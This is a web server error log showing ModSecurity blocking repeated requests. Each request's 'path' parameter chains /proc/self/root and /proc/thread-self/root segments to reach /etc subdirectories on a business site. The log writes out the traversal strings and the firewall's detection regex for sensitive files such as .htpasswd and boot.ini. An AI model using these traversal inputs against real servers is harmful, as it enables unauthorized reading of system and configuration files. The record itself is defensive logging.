https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:21.072037 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:55466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1meyqAr6etmhZHNqRSQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:22.319038 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:55470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1muw_le52K8_3pV22YQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:23.650660 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:55484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1m0zinOy1jxa1j4focwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:24.928218 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:55500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1nNY0UrI5A3LftIxvQQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:27.335780 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:55502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1n9Y0UrI5A3LftIxvRQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:51:30.779051 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:55504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1ogkwaGbbGflqUZDmgQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:32.159020 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:46868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1pOyqAr6etmhZHNqRTgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:35.501658 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:46884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1p-yqAr6etmhZHNqRUgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:36.862973 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:46892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1qEzinOy1jxa1j4foewAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:39.248019 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:46898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1q0zinOy1jxa1j4fofQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:40.533198 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:48394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1rCmAPhZkrhU8w4lDoAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:46.011397 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:48402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1sSmAPhZkrhU8w4lDpgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:51:48.300518 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:52398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1tOw_le52K8_3pV22eQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:51.513341 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:40720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1t0zinOy1jxa1j4fogQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:53.542787 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:48416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1uQkwaGbbGflqUZDmiAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:53.761777 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:40724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1ueyqAr6etmhZHNqRVQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:52:20.293190 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:40734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp11Pu8EFLIOrSqIpva6gAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:52:29.871071 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:34872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp13UzinOy1jxa1j4fopAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:52:33.622896 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:38820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp14eyqAr6etmhZHNqRZAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:52:56.085564 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:38822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1-AkwaGbbGflqUZDmvAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:02.193012 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:51782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1_imAPhZkrhU8w4lDxAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:03.507008 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:52092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1_-w_le52K8_3pV22jwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:04.840086 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:52108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2ANa6ubjKNq_cu4Zr_AAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
